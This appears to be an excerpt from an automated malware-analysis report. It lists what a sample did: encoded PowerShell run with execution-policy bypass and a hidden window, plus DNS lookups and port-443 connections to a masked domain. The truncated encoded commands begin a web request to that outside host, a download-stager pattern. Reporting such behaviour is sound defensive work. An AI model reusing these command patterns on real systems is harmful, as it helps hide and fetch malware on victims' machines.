Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AdABlAHAAbwB5AHMAeQAuAGMAbwBtAC8AYQBz...
- 'te##ysy.com':443
- 'te##ysy.com':443
- DNS ASK te##ysy.com
- '<SYSTEM32>\cmd.exe' /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AdABlAHAAbwB5AHMAeQAuA...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AdABlAHAAbwB5AHMAeQAuA...